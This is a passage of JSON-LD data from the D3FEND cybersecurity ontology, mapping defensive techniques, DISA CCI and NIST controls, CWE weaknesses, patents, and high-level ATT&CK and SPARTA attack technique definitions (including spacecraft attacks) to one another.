        "@id": "d3f:ATTACKThing"
      }
    },
    {
      "@id": "d3f:CCI-000352_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system prevents the installation of organization-defined critical software programs that are not signed with a certificate that is recognized and approved by the organization.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:ExecutableAllowlisting"
        },
        {
          "@id": "d3f:ExecutableDenylisting"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-18T00:00:00"
      },
      "rdfs:label": "CCI-000352"
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-4_14",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Information Flow Enforcement | Security or Privacy Policy Filter Constraints",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "rdfs:label": "AC-4(14)"
    },
    {
      "@id": "d3f:CCI-001124_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:BroadcastDomainIsolation"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system prevents discovery of specific system components composing a managed interface.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001124"
    },
    {
      "@id": "d3f:Satellite",
      "@type": "owl:Class",
      "d3f:definition": "A satellite or an artificial satellite is an object, typically a spacecraft, placed into orbit around a celestial body. They have a variety of uses, including communication relay, weather forecasting, navigation (GPS), broadcasting, scientific research, and Earth observation.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Satellite"
      },
      "rdfs:label": "Satellite",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Spacecraft"
        },
        {
          "@id": "_:N6b04a36be489476d987941d6cfeb2747"
        }
      ]
    },
    {
      "@id": "_:N6b04a36be489476d987941d6cfeb2747",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SatelliteTransponder"
      }
    },
    {
      "@id": "d3f:CWE-927",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-927",
      "d3f:definition": "The Android application uses an implicit intent for transmitting sensitive data to other applications.",
      "rdfs:label": "Use of Implicit Intent for Sensitive Communication",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-285"
        },
        {
          "@id": "d3f:CWE-668"
        }
      ]
    },
    {
      "@id": "d3f:Semi-supervisedPre-training",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-SSPT",
      "d3f:definition": "Pre-training methods are aimed to guide the parameters of a network towards interesting regions in model space using unlabeled data, before fine-tuning the parameters with the labeled data",
      "d3f:kb-article": "## References\nJashish Shrestha. (n.d.). Beginner's Guide to Semi-Supervised Learning. [Link](http://jashish.com.np/blog/posts/beginners-guide-to-semi-supervised-learning/)",
      "rdfs:label": "Semi-supervised Pre-training",
      "rdfs:subClassOf": {
        "@id": "d3f:UnsupervisedPreprocessing"
      }
    },
    {
      "@id": "d3f:CWE-687",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-687",
      "d3f:definition": "The product calls a function, procedure, or routine, but the caller specifies an argument that contains the wrong value, which may lead to resultant weaknesses.",
      "rdfs:label": "Function Call With Incorrectly Specified Argument Value",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-628"
      }
    },
    {
      "@id": "d3f:CCI-002421_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:EncryptedTunnels"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements cryptographic mechanisms to prevent unauthorized disclosure of information and/or detect changes to information during transmission unless otherwise protected by organization-defined alternative physical safeguards.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-02T00:00:00"
      },
      "rdfs:label": "CCI-002421"
    },
    {
      "@id": "d3f:T1574.007",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1574.007",
      "d3f:creates": {
        "@id": "d3f:ExecutableFile"
      },
      "d3f:definition": "Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. The PATH environment variable contains a list of directories (User and System) that the OS searches sequentially through in search of the binary that was called from a script or the command line.",
      "rdfs:label": "Path Interception by PATH Environment Variable",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1574"
        },
        {
          "@id": "_:N94f4f80078664de0b7919434ecab4bab"
        }
      ]
    },
    {
      "@id": "_:N94f4f80078664de0b7919434ecab4bab",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableFile"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-6_1",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Least Privilege | Authorize Access to Security Functions",
      "d3f:exactly": {
        "@id": "d3f:SystemConfigurationPermissions"
      },
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "AC-6(1)"
    },
    {
      "@id": "d3f:DiskPartitioning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DiskPartitioning"
      ],
      "d3f:creates": {
        "@id": "d3f:PartitionTable"
      },
      "d3f:d3fend-id": "D3-DKP",
      "d3f:definition": "Disk Partitioning is the process of dividing a disk into multiple distinct sections, known as partitions.",
      "d3f:kb-article": "### How it works\n\nEach partition can be managed separately and can have its own file system. Disk partitioning can be used to segregate sensitive data from less critical data, improve system performance, and enhance data management and recovery processes. It can also help in isolating different operating systems or environments on the same physical disk.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-Remembranceofdatapassed:Astudyofdisksanitizationpractices"
      },
      "rdfs:label": "Disk Partitioning",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DiskFormatting"
        },
        {
          "@id": "_:N41a558f1aa6d4ba3870da843768eb05f"
        }
      ]
    },
    {
      "@id": "_:N41a558f1aa6d4ba3870da843768eb05f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PartitionTable"
      }
    },
    {
      "@id": "d3f:CCI-001957_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:One-timePassword"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements organization-defined out-of-band authentication under organization-defined conditions.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-05-03T00:00:00"
      },
      "rdfs:label": "CCI-001957"
    },
    {
      "@id": "d3f:d3fend-catalog-data-property",
      "@type": "owl:DatatypeProperty",
      "rdfs:label": "d3fend-catalog-data-property",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-data-property"
      },
      "skos:altLabel": {
        "@language": "en",
        "@value": "d3fend-vendor-registry-data-property"
      }
    },
    {
      "@id": "d3f:CCI-002272_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:UserAccountPermissions"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system dynamically associates security attributes with organization-defined objects in accordance with organization-defined security policies as information is created and combined.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-24T00:00:00"
      },
      "rdfs:label": "CCI-002272"
    },
    {
      "@id": "d3f:Reference-BroadcastIsolationAndLevel3NetworkSwitch_HewlettPackardEnterpriseDevelopmentLP",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US5920699A"
      },
      "d3f:kb-abstract": "A network switch comprising a switching Application Specific Integrated Circuit (ASIC) and a Virtual Switching Engine (VSE) connected to a plurality of ports. The switching ASIC has a high-speed memory table which enables it to look up addresses that it has previously obtained and to forward unicast packets to said addresses. The VSE is a CPU that makes switching decisions outside of the ASIC and keeps track of any unknown addresses, forwarding the packets out the appropriate ports and answers broadcast packets by proxy for all known addresses without forwarding any of the packets down the VLANs, thereby freeing the VLAN bandwidth from excessive traffic. The system requires no user configuration because the switching methodology is self-adaptive to the network in which it is inserted and has the ability to perform router functions such as level 2 and 3 switching, spanning tree protocols and compatibility with Internetwork Packet and Internetwork Packet Exchange networks.",
      "d3f:kb-author": "Ballard C. Bare",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Hewlett Packard Enterprise Development LP",
      "d3f:kb-reference-of": {
        "@id": "d3f:BroadcastDomainIsolation"
      },
      "d3f:kb-reference-title": "Broadcast isolation and level 3 network switch",
      "rdfs:label": "Reference - Broadcast isolation and level 3 network switch - Hewlett Packard Enterprise Development LP"
    },
    {
      "@id": "d3f:RD-0001.03",
      "@type": "owl:Class",
      "d3f:attack-id": "RD-0001.03",
      "d3f:definition": "A well-resourced actor may field their own spacecraft or hosted payload to gain proximity, visibility, or RF leverage. Small satellites can be launched into nearby planes or phasing orbits to observe emissions, perform spectrum measurements, or test spoofing and denial techniques at short range. Hosted payloads on commercial buses provide co-location without full spacecraft development. Proximity also enables on-orbit relay, crosslink probing, or attempts to exploit weak segmentation between payload and bus on rideshares. Regulatory and tracking regimes complicate overt misuse, but shell companies, benign-seeming mission declarations, or flags of convenience can mask intent.",
      "rdfs:label": "Spacecraft - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/RD-0001/03/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:RD-0001"
      },
      "skos:prefLabel": "Spacecraft"
    },
    {
      "@id": "d3f:CWE-152",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-152",
      "d3f:definition": "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as macro symbols when they are sent to a downstream component.",
      "rdfs:label": "Improper Neutralization of Macro Symbols",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-138"
      }
    },
    {
      "@id": "d3f:CWE-612",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-612",
      "d3f:definition": "The product creates a search index of private or sensitive documents, but it does not properly limit index access to actors who are authorized to see the original information.",
      "rdfs:label": "Improper Authorization of Index Containing Sensitive Information",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1230"
      }
    },
    {
      "@id": "d3f:WindowsNtProtectVirtualMemory",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "rdfs:label": "Windows NtProtectVirtualMemory",
      "rdfs:seeAlso": {
        "@id": "https://www.delphibasics.info/home/delphibasicssnippets/nativewriteprocessmemoryapireplacement"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIAllocateMemory"
      }
    },
    {
      "@id": "d3f:SystemInitConfiguration",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "System initialization configuration information is configuration information used to configure the services, parameters, and initial settings for an operating system at startup.",
      "rdfs:label": "System Init Configuration",
      "rdfs:subClassOf": {
        "@id": "d3f:OperatingSystemConfigurationComponent"
      },
      "skos:altLabel": "Autoruns"
    },
    {
      "@id": "d3f:CWE-538",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-538",
      "d3f:definition": "The product places sensitive information into files or directories that are accessible to actors who are allowed to have access to the files, but not to the sensitive information.",
      "rdfs:label": "Insertion of Sensitive Information into Externally-Accessible File or Directory",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-200"
      }
    },
    {
      "@id": "d3f:PartitionTable",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:addresses": {
        "@id": "d3f:Partition"
      },
      "d3f:definition": "A partition is a fixed-size subset of a storage device which is treated as a unit by the operating system. A partition table is a table maintained on the storage device by the operating system describing the partitions on that device. The terms partition table and partition map are most commonly associated with the MBR partition table of a Master Boot Record (MBR) in IBM PC compatibles, but it may be used generically to refer to other \"formats\" that divide a disk drive into partitions, such as: GUID Partition Table (GPT), Apple partition map (APM), or BSD disklabel.",
      "d3f:may-contain": {
        "@id": "d3f:BootRecord"
      },
      "rdfs:isDefinedBy": {
        "@id": "dbr:Partition_table"
      },
      "rdfs:label": "Partition Table",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformationBearer"
        },
        {
          "@id": "_:N6a408017254d44cf86361cbbaebcfd7a"
        },
        {
          "@id": "_:N72c68255040b4c48b34e486645be46cf"
        }
      ]
    },
    {
      "@id": "_:N6a408017254d44cf86361cbbaebcfd7a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:addresses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Partition"
      }
    },
    {
      "@id": "_:N72c68255040b4c48b34e486645be46cf",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:BootRecord"
      }
    },
    {
      "@id": "d3f:CCI-002264_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:UserAccountPermissions"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization provides the means to associate organization-defined types of security attributes having organization-defined security attribute values with information in transmission.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-24T00:00:00"
      },
      "rdfs:label": "CCI-002264"
    },
    {
      "@id": "d3f:EX-0012.07",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0012.07",
      "d3f:definition": "Propulsion relies on parameters and sensed values that govern burns, pressure management, and safing. Editable items include thruster calibration and minimum impulse bit, valve timing and duty limits, inhibit masks, delta-V tables, plume keep-out constraints, tank pressure/temperature thresholds, leak-detection limits, and momentum-management coupling with attitude control. By modifying these, an adversary can provoke over-correction, waste propellant through repeated trims, bias orbit maintenance, or trigger protective sequences at inopportune times. False pressure or temperature readings can cause autonomous venting or lockouts; tweaked alignment matrices or misapplied gimbal limits can yield off-axis thrust and attitude excursions; altered desaturation rules can induce frequent wheel unloads that sap resources. Because consumables are finite and margins tight, even modest parameter drift can shorten mission life or violate keep-out and conjunction constraints while presenting as “normal” control activity.",
      "rdfs:label": "Propulsion Subsystem - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0012/07/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:EX-0012"
      },
      "skos:prefLabel": "Propulsion Subsystem"
    },
    {
      "@id": "d3f:CopyToken",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:SystemCall"
      ],
      "d3f:copies": {
        "@id": "d3f:AccessToken"
      },
      "rdfs:label": "Copy Token",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:Ndfb3df7163f048ef83f5b1d278d74fd2"
        }
      ]
    },
    {
      "@id": "_:Ndfb3df7163f048ef83f5b1d278d74fd2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:copies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AccessToken"
      }
    },
    {
      "@id": "d3f:CWE-46",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-46",
      "d3f:definition": "The product accepts path input in the form of trailing space ('filedir ') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.",
      "rdfs:label": "Path Equivalence: 'filename ' (Trailing Space)",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-162"
        },
        {
          "@id": "d3f:CWE-41"
        }
      ]
    },
    {
      "@id": "d3f:MessageTransferAgent",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A message transfer agent or mail transfer agent (MTA) or mail relay is software that transfers electronic mail messages from one computer to another using a client-server application architecture. An MTA implements both the client (sending) and server (receiving) portions of the Simple Mail Transfer Protocol.",
      "rdfs:label": "Message Transfer Agent",
      "rdfs:seeAlso": {
        "@id": "dbr:Message_transfer_agent"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:MailService"
      },
      "skos:altLabel": [
        "MTA",
        "Mail Transfer Agent"
      ]
    },
    {
      "@id": "d3f:NetworkAudioVisualStreamingResource",
      "@type": "owl:Class",
      "d3f:definition": "A server that provides digital audio-visual media content to users.",
      "rdfs:label": "Network Audio Visual Streaming Resource",
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkMultimediaStreamingResource"
      }
    },
    {
      "@id": "d3f:CWE-522",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-522",
      "d3f:definition": "The product transmits or stores authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval.",
      "rdfs:label": "Insufficiently Protected Credentials",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-1390"
        },
        {
          "@id": "d3f:CWE-668"
        }
      ]
    },
    {
      "@id": "d3f:CWE-1047",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1047",
      "d3f:definition": "The product contains modules in which one module has references that cycle back to itself, i.e., there are circular dependencies.",
      "rdfs:label": "Modules with Circular Dependencies",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1120"
      }
    },
    {
      "@id": "d3f:PerHostDownload-UploadRatioAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:PerHostDownload-UploadRatioAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:NetworkTraffic"
      },
      "d3f:d3fend-id": "D3-PHDURA",
      "d3f:definition": "Detecting anomalies that indicate malicious activity by comparing the amount of data downloaded versus data uploaded by a host.",
      "d3f:kb-article": "## How it works\nAggregate pull vs. push ratios from metadata are used to develop a baseline for a given host over a specific time period, e.g., over a three-hour period, one day, one week, etc. Anomalies identified over a threshold produce an alert.\n\n## Considerations\nCollection and analysis of large network packet captures requires large storage and intensive computing power. The time windows used to calculate the ratio may vary in implementations, this consideration should take into account a threat model and likely effects (impacts) delivered by an adversary.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-SystemForDetectingThreatsUsingScenario-basedTrackingOfInternalAndExternalNetworkTraffic_VECTRANETWORKSInc"
      },
      "rdfs:label": "Per Host Download-Upload Ratio Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkTrafficAnalysis"
        },
        {
          "@id": "_:N79ac84cf360b46efa828da937b63114d"
        }
      ]
    },
    {
      "@id": "_:N79ac84cf360b46efa828da937b63114d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "d3f:WindowsRegistryKeyRestoreEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a registry key is restored to a previous state using a backup or recovery mechanism.",
      "rdfs:label": "Windows Registry Key Restore Event",
      "rdfs:subClassOf": {
        "@id": "d3f:WindowsRegistryKeyEvent"
      }
    },
    {
      "@id": "d3f:T1122",
      "@type": "owl:Class",
      "d3f:attack-id": "T1122",
      "d3f:definition": "The Component Object Model (COM) is a system within Windows to enable interaction between software components through the operating system. (Citation: Microsoft Component Object Model) Adversaries can use this system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Windows Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary's code will be executed instead. (Citation: GDATA COM Hijacking) An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1546.015",
      "rdfs:label": "Component Object Model Hijacking",
      "rdfs:seeAlso": {
        "@id": "d3f:T1546.015"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:PersistenceTechnique"
        }
      ]
    },
    {
      "@id": "d3f:CWE-595",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-595",
      "d3f:definition": "The product compares object references instead of the contents of the objects themselves, preventing it from detecting equivalent objects.",
      "rdfs:label": "Comparison of Object References Instead of Object Contents",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1025"
      }
    },
    {
      "@id": "d3f:may-be-accessed-by",
      "@type": "owl:ObjectProperty",
      "rdfs:label": "may-be-accessed-by",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-be-associated-with"
      }
    },
    {
      "@id": "d3f:NTPControlMessageEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where an NTP client or server exchanges control messages used for diagnostic, monitoring, or administrative management of the NTP protocol, rather than time synchronization.",
      "rdfs:label": "NTP Control Message Event",
      "rdfs:subClassOf": {
        "@id": "d3f:NTPEvent"
      }
    },
    {
      "@id": "d3f:MobilePhone",
      "@type": "owl:Class",
      "d3f:definition": "A mobile phone, cellular phone, cell phone, cellphone or hand phone, sometimes shortened to simply mobile, cell or just phone, is a portable telephone that can make and receive calls over a radio frequency link while the user is moving within a telephone service area. The radio frequency link establishes a connection to the switching systems of a mobile phone operator, which provides access to the public switched telephone network (PSTN). Modern mobile telephone services use a cellular network architecture and, therefore, mobile telephones are called cellular telephones or cell phones in North America. In addition to telephony, digital mobile phones (2G) support a variety of other services, such as text messaging, MMS, email, Internet access, short-range wireless communications (infrared,",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Mobile_phone"
      },
      "rdfs:label": "Mobile Phone",
      "rdfs:subClassOf": {
        "@id": "d3f:PersonalComputer"
      },
      "skos:altLabel": [
        "Cellphone",
        "Cellular Phone"
      ]
    },
    {
      "@id": "d3f:maps",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x maps y: The entity x discovers and records how entity y is arranged and interconnected.",
      "rdfs:label": "maps",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-map"
      }
    },
    {
      "@id": "d3f:Reference-SystemAndMethodForProvidingAnActivelyInvalidatedClient-sideNetworkResourceCache_IMVU",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US9578081B2/en"
      },
      "d3f:kb-abstract": "A system and method for providing an actively invalidated client-side network resource cache are disclosed. A particular embodiment includes: a client configured to request, for a client application, data associated with an identifier from a server; the server configured to provide the data associated with the identifier and to establish a queue associated with the identifier at a scalable message queuing system, the client being configured to subscribe to the queue at the scalable message queuing system to receive invalidation information associated with the data; the server being further configured to signal the queue of an invalidation event associated with the data; the scalable message queuing system being configured to convey information indicative of the invalidation event to the client; and the client being further configured to re-request the data associated with the identifier from the server upon receipt of the information indicative of the invalidation event.",
      "d3f:kb-author": "Jon Watte",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "IMVU",
      "d3f:kb-reference-of": {
        "@id": "d3f:AuthenticationCacheInvalidation"
      },
      "d3f:kb-reference-title": "System and method for providing an actively invalidated client-side network resource cache",
      "rdfs:label": "Reference - System and method for providing an actively invalidated client-side network resource cache - IMVU"
    },
    {
      "@id": "d3f:DisableRemoteAccess",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DisableRemoteAccess"
      ],
      "d3f:configures": {
        "@id": "d3f:ApplicationConfiguration"
      },
      "d3f:d3fend-id": "D3-DRA",
      "d3f:definition": "Limiting access to a computing device which is not required through or from a non-organization-controlled network.",
      "d3f:kb-article": "## How It Works\nThere are several different methods of achieving remote access restriction. This could include: time-based controls, just-in-time authorization, and deny-by-default controls.\n\nThis can be done on a Windows machine by unchecking an \"allow remote assistance\" or checking the \"don't allow remote connections\" boxes; creating firewall rules to block remote access protocols; uninstalling remote access software; disabling Wi-Fi, Ethernet, Bluetooth, or other connection methods enabling remote access.\n\nOne way to achieve remote access restrictions in OT is by programming logic in the OT Controller to give the Operator authorizing abilities which ensures local control is maintained. In this situation, a remote access modem would be powered on/off using a discrete output from an I/O module of the OT controller.\n    ",
      "rdfs:label": "Disable Remote Access",
      "rdfs:seeAlso": [
        {
          "@id": "https://www.dragos.com/blog/industry-news/value-of-plc-key-switch-monitoring/#:~:text=Run%20mode%E2%80%94The%20controller%20is,in%20the%20Remote%20Program%20mode"
        },
        "M0800 Authorization Enforcement"
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationConfigurationHardening"
        },
        {
          "@id": "_:Nea555d495c4447c7a77cb3e28c17a482"
        }
      ]
    },
    {
      "@id": "_:Nea555d495c4447c7a77cb3e28c17a482",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:configures"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ApplicationConfiguration"
      }
    },
    {
      "@id": "d3f:T1635",
      "@type": "owl:Class",
      "d3f:attack-id": "T1635",
      "d3f:definition": "Adversaries can steal user application access tokens as a means of acquiring credentials to access remote systems and resources. This can occur through social engineering or URI hijacking and typically requires user action to grant access, such as through a system “Open With” dialogue.",
      "rdfs:label": "Steal Application Access Token - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileCredentialAccessTechnique"
      },
      "skos:prefLabel": "Steal Application Access Token"
    },
    {
      "@id": "d3f:may-block",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x may-block y: The entity x may block the thing y; that is, 'x blocks y' may be true.",
      "rdfs:label": "may-block",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-be-associated-with"
      }
    },
    {
      "@id": "d3f:CWE-1338",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1338",
      "d3f:definition": "A hardware device is missing or has inadequate protection features to prevent overheating.",
      "rdfs:label": "Improper Protections Against Hardware Overheating",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-693"
      }
    },
    {
      "@id": "d3f:ExternalControl",
      "@type": "owl:Class",
      "rdfs:label": "External Control",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ExternalControlThing"
        },
        {
          "@id": "_:N10188d6b281b4f16a9765da3ff0036a1"
        },
        {
          "@id": "_:Ncfd1e18c4982469394a6104db3a0f555"
        }
      ]
    },
    {
      "@id": "_:N10188d6b281b4f16a9765da3ff0036a1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:member-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ControlCatalog"
      }
    },
    {
      "@id": "_:Ncfd1e18c4982469394a6104db3a0f555",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:semantic-relation"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DefensiveTechnique"
      }
    },
    {
      "@id": "d3f:DHCPServiceApplication",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An application that automates the assignment of IP addresses and other network configuration parameters to devices on a network",
      "d3f:instructs": {
        "@id": "d3f:DHCPService"
      },
      "rdfs:label": "DHCP Service Application",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ServiceApplication"
        },
        {
          "@id": "_:N7ea2e698786f4972ba945b99e5e5d585"
        }
      ]
    },
    {
      "@id": "_:N7ea2e698786f4972ba945b99e5e5d585",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:instructs"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DHCPService"
      }
    },
    {
      "@id": "d3f:Reference-MethodUsingKernelModeAssistanceForTheDetectionAndRemovalOfThreatsWhichAreActivelyPreventingDetectionAndRemovalFromARunningSystem_SymantecCorporation",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US8239947B1"
      },
      "d3f:kb-abstract": "A user mode application component invokes the assistance of a kernel mode driver component to detect and/or remediate malicious code on a computer system. The user mode application may include code that detects, for example, spyware and computer viruses, from user mode and when appropriate takes protective action when malicious code is detected. In one aspect, when the user mode application is unable to perform a selected operation in attempting to detect and/or take protective action, the user mode application invokes a kernel mode driver for assistance. The kernel mode driver assists user mode application in detecting malicious code and/or taking protective action by enabling or otherwise performing a selected operation for the user mode application.",
      "d3f:kb-author": "Adam Glick, Patrick Gardner, Pieter Viljoen",
      "d3f:kb-mitre-analysis": "This patent describes detecting registry changes using a prohibited change heuristic or a database of prohibited functions/function parameters.",
      "d3f:kb-organization": "Symantec Corporation",
      "d3f:kb-reference-of": {
        "@id": "d3f:SystemDaemonMonitoring"
      },
      "d3f:kb-reference-title": "Method using kernel mode assistance for the detection and removal of threats which are actively preventing detection and removal from a running system",
